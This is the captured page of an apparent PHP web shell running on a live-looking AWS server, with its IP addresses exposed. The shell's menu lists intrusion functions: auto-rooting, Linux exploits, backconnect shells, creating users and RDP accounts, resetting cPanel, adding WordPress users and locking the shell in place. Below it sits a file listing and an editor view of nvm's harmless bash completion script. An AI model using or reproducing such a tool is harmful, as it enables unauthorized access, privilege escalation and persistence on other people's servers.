Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 52.14.125.232
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
nvm /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxrwxr-x
test
[ DIR ]
drwxrwxr-x
.dockerignore
140
B
-rw-rw-r--
.editorconfig
523
B
-rw-rw-r--
.gitattributes
9
B
-rw-rw-r--
.gitignore
253
B
-rw-rw-r--
.mailmap
51
B
-rw-rw-r--
.npmrc
19
B
-rw-rw-r--
.travis.yml
2.67
KB
-rw-rw-r--
CONTRIBUTING.md
1.03
KB
-rw-rw-r--
Dockerfile
3.64
KB
-rw-rw-r--
LICENSE.md
1.09
KB
-rw-rw-r--
Makefile
5.24
KB
-rw-rw-r--
README.md
35.33
KB
-rw-rw-r--
ROADMAP.md
882
B
-rw-rw-r--
bash_completion
2.07
KB
-rw-rw-r--
install.sh
13.21
KB
-rwxrwxr-x
nvm-exec
344
B
-rwxrwxr-x
nvm.sh
129.5
KB
-rw-rw-r--
package.json
1.99
KB
-rw-rw-r--
update_test_mocks.sh
2.31
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bash_completion
#!/usr/bin/env bash # bash completion for Node Version Manager (NVM) if ! command -v nvm &> /dev/null; then return fi __nvm_generate_completion() { declare current_word current_word="${COMP_WORDS[COMP_CWORD]}" # shellcheck disable=SC2207 COMPREPLY=($(compgen -W "$1" -- "${current_word}")) return 0 } __nvm_commands() { declare current_word declare command current_word="${COMP_WORDS[COMP_CWORD]}" COMMANDS=' help install uninstall use run exec alias unalias reinstall-packages current list ls list-remote ls-remote install-latest-npm cache deactivate unload version version-remote which' if [ ${#COMP_WORDS[@]} == 4 ]; then command="${COMP_WORDS[COMP_CWORD - 2]}" case "${command}" in alias) __nvm_installed_nodes ;; esac else case "${current_word}" in -*) __nvm_options ;; *) __nvm_generate_completion "${COMMANDS}" ;; esac fi } __nvm_options() { OPTIONS='' __nvm_generate_completion "${OPTIONS}" } __nvm_installed_nodes() { __nvm_generate_completion "$(nvm_ls) $(__nvm_aliases)" } __nvm_aliases() { declare aliases aliases="" if [ -d "${NVM_DIR}/alias" ]; then aliases="$(cd "${NVM_DIR}/alias" && command find "${PWD}" -type f | command sed "s:${PWD}/::")" fi echo "${aliases} node stable unstable iojs" } __nvm_alias() { __nvm_generate_completion "$(__nvm_aliases)" } __nvm() { declare previous_word previous_word="${COMP_WORDS[COMP_CWORD - 1]}" case "${previous_word}" in use | run | exec | ls | list | uninstall) __nvm_installed_nodes ;; alias | unalias) __nvm_alias ;; *) __nvm_commands ;; esac return 0 } # complete is a bash builtin, but recent versions of ZSH come with a function # called bashcompinit that will create a complete in ZSH. If the user is in # ZSH, load and run bashcompinit before calling the complete function. if [[ -n ${ZSH_VERSION-} ]]; then autoload -U +X bashcompinit && bashcompinit autoload -U +X compinit && if [[ ${ZSH_DISABLE_COMPFIX-} = true ]]; then compinit -u else compinit fi fi complete -o default -F __nvm nvm
Close